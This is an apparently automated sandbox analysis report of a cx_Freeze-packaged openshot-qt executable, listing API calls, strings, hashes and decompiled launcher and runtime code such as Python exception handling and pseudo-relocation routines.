                                                                    0x00301c05
                                                                    0x00301c0a
                                                                    0x00301c0e
                                                                    0x00301d09
                                                                    0x00000000
                                                                    0x00301c14
                                                                    0x00301c14
                                                                    0x00301c18
                                                                    0x00301c20
                                                                    0x00301c23
                                                                    0x00301c2a
                                                                    0x00301c35
                                                                    0x00301c3a
                                                                    0x00301c42
                                                                    0x00301c4a
                                                                    0x00301c51
                                                                    0x00301c58
                                                                    0x00301d68
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00301c5e
                                                                    0x00301c5e
                                                                    0x00301c5e
                                                                    0x00301c63
                                                                    0x00301d50
                                                                    0x00301d53
                                                                    0x00301d58
                                                                    0x00301d58
                                                                    0x00301c69
                                                                    0x00301c6e
                                                                    0x00301d40
                                                                    0x00301d43
                                                                    0x00301d43
                                                                    0x00301c74
                                                                    0x00301c78
                                                                    0x00301c80
                                                                    0x00301c84
                                                                    0x00301c8b
                                                                    0x00301c9f
                                                                    0x00301c9f
                                                                    0x00301c2a
                                                                    0x00301c0e
                                                                    0x00301bf8
                                                                    0x00301bd4
                                                                    0x00301bbe
                                                                    0x00301b28
                                                                    0x00301b28
                                                                    0x00301b2c
                                                                    0x00301b2f
                                                                    0x00301b36
                                                                    0x00301d30
                                                                    0x00301b3c
                                                                    0x00301b45
                                                                    0x00301b45
                                                                    0x00301b4a
                                                                    0x00301b50
                                                                    0x00301b50

                                                                    APIs
                                                                    • PySys_GetObject.LIBPYTHON3.8 ref: 00301B0D
                                                                    • PySys_GetObject.LIBPYTHON3.8 ref: 00301B1B
                                                                    • PyObject_CallObject.LIBPYTHON3.8 ref: 00301B2F
                                                                      • Part of subcall function 00301600: PyErr_Fetch.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 00301622
                                                                      • Part of subcall function 00301600: PyErr_NormalizeException.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 00301636
                                                                      • Part of subcall function 00301600: strlen.MSVCRT ref: 0030163E
                                                                      • Part of subcall function 00301600: PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00301652
                                                                      • Part of subcall function 00301600: PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00301678
                                                                      • Part of subcall function 00301600: PyTuple_New.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0030168E
                                                                      • Part of subcall function 00301600: PyUnicode_Format.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 003016C8
                                                                      • Part of subcall function 00301600: PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 003016EE
                                                                      • Part of subcall function 00301600: MessageBoxW.USER32 ref: 00301728
                                                                    • PyImport_ImportModule.LIBPYTHON3.8 ref: 00301B9F
                                                                    • PyObject_GetAttrString.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301BB7
                                                                    • PyObject_CallObject.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301BCB
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301BF1
                                                                    • PyUnicode_Join.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301C05
                                                                    • PyObject_GetAttrString.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301C23
                                                                    • PyErr_Clear.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301C35
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301C51
                                                                    • MessageBoxW.USER32 ref: 00301C8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Unicode_$Decode$Object.Object_$Err_$AttrCallMessageString.Sys_$Clear.Exception.Fetch.Format.ImportImport_Join.Module.New.NormalizeTuple_strlen
                                                                    • String ID: Error in sys.excepthook.$__excepthook__$excepthook
                                                                    • API String ID: 2620894728-2695348168
                                                                    • Opcode ID: ee5c1db549186f55a2d99bade810e7d3df5081bf1ded4eff71692b3102ef1b69
                                                                    • Instruction ID: 4f2e269d57f2af5c1265a78797ea17dbfa24d71d2e648363bce2c615e2f04454
                                                                    • Opcode Fuzzy Hash: ee5c1db549186f55a2d99bade810e7d3df5081bf1ded4eff71692b3102ef1b69
                                                                    • Instruction Fuzzy Hash: AFF0A0B68077108BC7137F24A46426EB7E0AF05380F06092CECC09B281E7318C85C792
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 9842c1258b23bf39e75b9024845fb153c4c9010421fd228f3b2769be831f0da0
                                                                    • Instruction ID: 9fa73dfddd053bac4f63ef6d42f6bdef671000b096c80bc1823f65c38b480e0d
                                                                    • Opcode Fuzzy Hash: 9842c1258b23bf39e75b9024845fb153c4c9010421fd228f3b2769be831f0da0
                                                                    • Instruction Fuzzy Hash: 58C19EB5A023058BCB16CF29D5A079EBBF5BF88340F158559EA49AB395D334EE01CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PyUnicode_Format.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 003016C8
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 003016EE
                                                                    • MessageBoxW.USER32 ref: 00301728
                                                                    Strings
                                                                    • >, xrefs: 003016DF
                                                                    • cx_Freeze: Python error in main script (traceback unavailable), xrefs: 003016E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Unicode_$DecodeFormat.Message
                                                                    • String ID: >$cx_Freeze: Python error in main script (traceback unavailable)
                                                                    • API String ID: 990826727-2673323565
                                                                    • Opcode ID: ee8c3d4b31b6c90a5f727370a15bad510dad317dd35da502ae81963244630866
                                                                    • Instruction ID: a8d4744e8e71ceb4f96e7183dd31c6bb280e0e443365756cb592b276598b4db3
                                                                    • Opcode Fuzzy Hash: ee8c3d4b31b6c90a5f727370a15bad510dad317dd35da502ae81963244630866
                                                                    • Instruction Fuzzy Hash: 2801BCB1A063018FD3169F28D9A431BBBE8FF48754F01CA5DE8988B2D1C375C980DB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • Out of memory creating sys.path!, xrefs: 00301FC0
                                                                    • cx_Freeze Fatal Error, xrefs: 00301FB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Finalize.$Message
                                                                    • String ID: Out of memory creating sys.path!$cx_Freeze Fatal Error
                                                                    • API String ID: 2963964078-657178042
                                                                    • Opcode ID: 2548316520547431ce4d90520fbef6ec41f153366d964c1680cd1d28562d8e6e
                                                                    • Instruction ID: a683bda7639c5858f76115a160cf953d3de382646dc5b83fa38336d376887279
                                                                    • Opcode Fuzzy Hash: 2548316520547431ce4d90520fbef6ec41f153366d964c1680cd1d28562d8e6e
                                                                    • Instruction Fuzzy Hash: 62E08C769063108ED3026FA8E52839FBBA1EB54355F00882AE18857182C3B644989B97
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: atoisetlocalestrchr
                                                                    • String ID: .
                                                                    • API String ID: 1223908000-248832578
                                                                    • Opcode ID: 2e20cc0a2f8bd01d80a18571f6e875e0734c2b59010ac96151a74daf2c5f9a7c
                                                                    • Instruction ID: 0f4dad3fa54349d3c199daab132e37509b1c301e3e5ec32615f96a64f83be347
                                                                    • Opcode Fuzzy Hash: 2e20cc0a2f8bd01d80a18571f6e875e0734c2b59010ac96151a74daf2c5f9a7c
                                                                    • Instruction Fuzzy Hash: 4AE0ECB1905B009AD7057F38C51A31AB6E1AF80304F89C86CE4C88B285EB7998459752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00301766(void* _a4, void* _a8, void* _a12) {
                                                                    
                                                                    				MessageBoxA("Cannot format exception values.", "cx_Freeze Fatal Error", 0, 0x10);
                                                                    				L00302020();
                                                                    				return 0xffffffff;
                                                                    			}



                                                                    0x0030178f
                                                                    0x00301798
                                                                    0x003017a9

                                                                    APIs
                                                                    • MessageBoxA.USER32 ref: 0030178F
                                                                    • Py_Finalize.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 00301798
                                                                    Strings
                                                                    • Cannot format exception values., xrefs: 00301780
                                                                    • cx_Freeze Fatal Error, xrefs: 00301778
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Finalize.Message
                                                                    • String ID: Cannot format exception values.$cx_Freeze Fatal Error
                                                                    • API String ID: 3371540930-3336796716
                                                                    • Opcode ID: 029145a5c693d686d83bbad5eaa2f7f96f5a835db503e2b4715f25b9390ad9e9
                                                                    • Instruction ID: eaa7e2e2d752d7c8605796d26e23f44ddf8443d83bb4f99beb7d2708a4f10ee3
                                                                    • Opcode Fuzzy Hash: 029145a5c693d686d83bbad5eaa2f7f96f5a835db503e2b4715f25b9390ad9e9
                                                                    • Instruction Fuzzy Hash: 9DE0EC765097149BD7016F68E81834ABBA0FB44329F008A1DE5AC57290C7B554998B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00301887(void* _a4, void* _a8, void* _a12) {
                                                                    
                                                                    				MessageBoxA(0, "Cannot create format args tuple.", "cx_Freeze Fatal Error", 0x10);
                                                                    				__esp = __esp - 0x10;
                                                                    				L00302020();
                                                                    				return 0xffffffff;
                                                                    			}



                                                                    0x003018af
                                                                    0x003018b5
                                                                    0x003018b8
                                                                    0x0030173d

                                                                    APIs
                                                                    • MessageBoxA.USER32 ref: 003018AF
                                                                    • Py_Finalize.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 003018B8
                                                                    Strings
                                                                    • Cannot create format args tuple., xrefs: 003018A0
                                                                    • cx_Freeze Fatal Error, xrefs: 00301898
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Finalize.Message
                                                                    • String ID: Cannot create format args tuple.$cx_Freeze Fatal Error
                                                                    • API String ID: 3371540930-4127953363
                                                                    • Opcode ID: d0b342c61131914e47e0aa1aa52f0627d7be50f8ae356ff447e20b762c2a4fd9
                                                                    • Instruction ID: 53d74c1d2a53c964b481fe8f9d97360e01c6590e6955de8a57ff879b7743c243
                                                                    • Opcode Fuzzy Hash: d0b342c61131914e47e0aa1aa52f0627d7be50f8ae356ff447e20b762c2a4fd9
                                                                    • Instruction Fuzzy Hash: E5D0927140A7049ED3026F68D42935FBBE0BB48305F108C0CE0D917190C7B450889B47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsDBCSLeadByteEx.KERNEL32 ref: 00308452
                                                                    • MultiByteToWideChar.KERNEL32 ref: 00308495
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Byte$CharLeadMultiWide
                                                                    • String ID:
                                                                    • API String ID: 2561704868-0
                                                                    • Opcode ID: 43d8947068d761ab1ac53279ccd006fbe47e667b3b58fd3a38c4f16dfdca7b0e
                                                                    • Instruction ID: f4bda39f31c258c946cb8210b2117e2071e7327125f2521281beff9ae777bff2
                                                                    • Opcode Fuzzy Hash: 43d8947068d761ab1ac53279ccd006fbe47e667b3b58fd3a38c4f16dfdca7b0e
                                                                    • Instruction Fuzzy Hash: 46413AB050A3418FD711DF29E49435ABBE0BF8A314F15892DF8D587390DBB6D849CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: __p__commode__p__fmode__set_app_type
                                                                    • String ID:
                                                                    • API String ID: 3338496922-0
                                                                    • Opcode ID: 6375ef2bcde8fc981f89c186cf7872f1244124d06f45003b6cbf52d0727d06a6
                                                                    • Instruction ID: e1f2bb795354478198b5533b9427a9fa3533a89ee234060cb323251a42b60b9d
                                                                    • Opcode Fuzzy Hash: 6375ef2bcde8fc981f89c186cf7872f1244124d06f45003b6cbf52d0727d06a6
                                                                    • Instruction Fuzzy Hash: CC218174503201CFC327AF24C87536633E9BB40348F55856AD4844F6D7D77A98C6DBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 39%
                                                                    			E00302540(signed int __eax, void* __ebx, void* __edi, signed int __esi) {
                                                                    				void* _v16;
                                                                    				char _v32;
                                                                    				void* _v45;
                                                                    				signed int _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				intOrPtr _v64;
                                                                    				signed int _v68;
                                                                    				signed int _v72;
                                                                    				signed int _v96;
                                                                    				signed int _v104;
                                                                    				signed int _v112;
                                                                    				signed int _v116;
                                                                    				char _v120;
                                                                    				signed int _t54;
                                                                    				void* _t60;
                                                                    				int _t67;
                                                                    				signed int _t70;
                                                                    				void* _t71;
                                                                    				signed int* _t81;
                                                                    				signed int* _t84;
                                                                    				signed int _t85;
                                                                    				signed int _t87;
                                                                    				signed int _t90;
                                                                    				signed int _t91;
                                                                    				signed int _t93;
                                                                    				signed char _t103;
                                                                    				intOrPtr _t106;
                                                                    				signed int _t107;
                                                                    				signed int _t109;
                                                                    				short _t112;
                                                                    				signed int _t115;
                                                                    				signed int _t116;
                                                                    				signed int _t121;
                                                                    				char* _t122;
                                                                    				signed char* _t125;
                                                                    				void* _t130;
                                                                    				void* _t131;
                                                                    				char** _t132;
                                                                    				intOrPtr* _t135;
                                                                    				signed int _t140;
                                                                    
                                                                    				_t119 = __esi;
                                                                    				_t54 = __eax;
                                                                    				_push(__edi);
                                                                    				_push(__esi);
                                                                    				_push(__ebx);
                                                                    				_t131 = _t130 - 0x3c;
                                                                    				_t103 =  *0x30f0cc;
                                                                    				if(_t103 == 0) {
                                                                    					 *0x30f0cc = 1;
                                                                    					_t60 = E00303030(0x1b + (E00302DE0() + _t55 * 4) * 4 >> 4 << 4);
                                                                    					 *0x30f0d0 = 0;
                                                                    					_t132 = _t131 - _t60;
                                                                    					 *0x30f0d4 =  &_v45 & 0xfffffff0;
                                                                    					_t54 = 0;
                                                                    					__eflags = 0x30b170 - 7;
                                                                    					if(0x30b170 <= 7) {
                                                                    						goto L1;
                                                                    					} else {
                                                                    						_t90 =  *0x30b170; // 0x0
                                                                    						__eflags = 0x30b170 - 0xb;
                                                                    						if(0x30b170 > 0xb) {
                                                                    							L17:
                                                                    							__eflags = _t90;
                                                                    							if(_t90 != 0) {
                                                                    								_t81 = 0x30b170;
                                                                    								goto L24;
                                                                    							} else {
                                                                    								_t54 =  *0x30b174; // 0x0
                                                                    								_t119 = _t54 |  *0x30b178;
                                                                    								__eflags = _t54 |  *0x30b178;
                                                                    								if((_t54 |  *0x30b178) != 0) {
                                                                    									_t81 = 0x30b170;
                                                                    									goto L7;
                                                                    								} else {
                                                                    									_t90 =  *0x30b17c; // 0x0
                                                                    									_t81 = 0x30b17c;
                                                                    									goto L5;
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							_t81 = 0x30b170;
                                                                    							L5:
                                                                    							__eflags = _t90;
                                                                    							if(_t90 != 0) {
                                                                    								L24:
                                                                    								__eflags = _t81 - 0x30b170;
                                                                    								if(_t81 >= 0x30b170) {
                                                                    									goto L1;
                                                                    								} else {
                                                                    									_v48 = _t103;
                                                                    									do {
                                                                    										_t26 =  &(_t81[1]); // 0x0
                                                                    										_t121 =  *_t26;
                                                                    										_t91 =  *_t81;
                                                                    										_t81 =  &(_t81[2]);
                                                                    										_t27 = _t121 + 0x300000; // 0x905a4d
                                                                    										_t28 = _t121 + 0x300000; // 0x300000
                                                                    										_t106 =  *_t27 + _t91;
                                                                    										E003023E0(_t28, _t81, _t106, _t121);
                                                                    										 *((intOrPtr*)(_t121 + 0x300000)) = _t106;
                                                                    										__eflags = _t81 - 0x30b170;
                                                                    									} while (_t81 < 0x30b170);
                                                                    									_t107 = _v48;
                                                                    									goto L28;
                                                                    								}
                                                                    							} else {
                                                                    								_t7 =  &(_t81[1]); // 0x0
                                                                    								_t54 =  *_t7;
                                                                    								L7:
                                                                    								__eflags = _t54;
                                                                    								if(_t54 != 0) {
                                                                    									goto L24;
                                                                    								} else {
                                                                    									_t8 =  &(_t81[2]); // 0x0
                                                                    									_t54 =  *_t8;
                                                                    									__eflags = _t54 - 1;
                                                                    									if(__eflags != 0) {
                                                                    										_v72 = _t54;
                                                                    										 *_t132 = "  Unknown pseudo relocation protocol version %d.\n";
                                                                    										E00302380(_t81, _t103, _t119, __eflags);
                                                                    										0;
                                                                    										_t135 = _t132 - 0x3c;
                                                                    										_t70 =  *0x30f0d8;
                                                                    										_t140 = _v48;
                                                                    										__eflags = _t70;
                                                                    										if(_t70 == 0) {
                                                                    											st0 = _t140;
                                                                    											st0 = _t140;
                                                                    											st0 = _t140;
                                                                    										} else {
                                                                    											asm("fxch st0, st2");
                                                                    											_v112 = _t140;
                                                                    											_v104 = _t140;
                                                                    											_v120 = _v72;
                                                                    											_v96 = _t140;
                                                                    											_v116 = _v68;
                                                                    											 *_t135 =  &_v120;
                                                                    											_t70 =  *_t70();
                                                                    										}
                                                                    										return _t70;
                                                                    									} else {
                                                                    										_t84 =  &(_t81[3]);
                                                                    										__eflags = _t84 - 0x30b170;
                                                                    										if(_t84 >= 0x30b170) {
                                                                    											goto L1;
                                                                    										} else {
                                                                    											_v56 = _t103;
                                                                    											while(1) {
                                                                    												L13:
                                                                    												_t85 =  *_t84;
                                                                    												_t11 =  &(_t84[1]); // 0x2e303120
                                                                    												_t90 =  *_t11;
                                                                    												_t71 = _t85 + 0x300000;
                                                                    												_t14 = _t90 + 0x300000; // 0x2e603120
                                                                    												_t125 = _t14;
                                                                    												_v48 =  *((intOrPtr*)(_t85 + 0x300000));
                                                                    												_t16 =  &(_t84[2]); // 0x302e32
                                                                    												_t87 =  *_t16 & 0x000000ff;
                                                                    												__eflags = _t87 - 0x10;
                                                                    												if(_t87 == 0x10) {
                                                                    													break;
                                                                    												}
                                                                    												__eflags = _t87 - 0x20;
                                                                    												if(_t87 == 0x20) {
                                                                    													_t115 = _v48 - _t71 +  *_t125;
                                                                    													__eflags = _t115;
                                                                    													E003023E0(_t125, _t84, _t115, _t125);
                                                                    													 *_t125 = _t115;
                                                                    													goto L12;
                                                                    												} else {
                                                                    													__eflags = _t87 - 8;
                                                                    													if(__eflags == 0) {
                                                                    														_t116 =  *_t125 & 0x000000ff;
                                                                    														__eflags = _t116;
                                                                    														_t117 =  <  ? _t116 | 0xffffff00 : _t116;
                                                                    														_t118 = ( <  ? _t116 | 0xffffff00 : _t116) - _t71;
                                                                    														_t103 = ( <  ? _t116 | 0xffffff00 : _t116) - _t71 + _v48;
                                                                    														E003023E0(_t125, _t84, _t103, _t125);
                                                                    														 *_t125 = _t103;
                                                                    														L12:
                                                                    														_t84 =  &(_t84[3]);
                                                                    														__eflags = _t84 - 0x30b170;
                                                                    														if(_t84 >= 0x30b170) {
                                                                    															L21:
                                                                    															_t107 = _v56;
                                                                    															L28:
                                                                    															_t54 =  *0x30f0d0;
                                                                    															__eflags = _t54;
                                                                    															if(_t54 <= 0) {
                                                                    																goto L1;
                                                                    															} else {
                                                                    																_t122 =  &_v32;
                                                                    																do {
                                                                    																	_t67 =  *0x30f0d4 + (_t107 + _t107 * 4) * 4;
                                                                    																	_t93 =  *_t67;
                                                                    																	__eflags = _t93;
                                                                    																	if(_t93 != 0) {
                                                                    																		_v64 = _t122;
                                                                    																		_v68 = _t93;
                                                                    																		_v72 =  *((intOrPtr*)(_t67 + 8));
                                                                    																		 *_t132 =  *(_t67 + 4);
                                                                    																		_t67 = VirtualProtect(??, ??, ??, ??);
                                                                    																		_t132 = _t132 - 0x10;
                                                                    																	}
                                                                    																	_t107 = _t107 + 1;
                                                                    																	__eflags = _t107 -  *0x30f0d0;
                                                                    																} while (_t107 <  *0x30f0d0);
                                                                    																return _t67;
                                                                    															}
                                                                    														} else {
                                                                    															continue;
                                                                    														}
                                                                    													} else {
                                                                    														_v72 = _t87;
                                                                    														 *_t132 = "  Unknown pseudo relocation bit size %d.\n";
                                                                    														_t54 = E00302380(_t84, _t103, _t125, __eflags);
                                                                    														goto L17;
                                                                    													}
                                                                    												}
                                                                    												goto L39;
                                                                    											}
                                                                    											_t18 = _t90 + 0x300000; // 0x905a4d
                                                                    											_t109 =  *_t18 & 0x0000ffff;
                                                                    											_v52 = _t90;
                                                                    											__eflags = _t109;
                                                                    											_t110 =  <  ? _t109 | 0xffff0000 : _t109;
                                                                    											_t84 =  &(_t84[3]);
                                                                    											_t111 = ( <  ? _t109 | 0xffff0000 : _t109) - _t71;
                                                                    											_t112 = ( <  ? _t109 | 0xffff0000 : _t109) - _t71 + _v48;
                                                                    											E003023E0(_t125, _t84, _t112, _t125);
                                                                    											 *((short*)(_v52 + 0x300000)) = _t112;
                                                                    											__eflags = _t84 - 0x30b170;
                                                                    											if(_t84 < 0x30b170) {
                                                                    												goto L13;
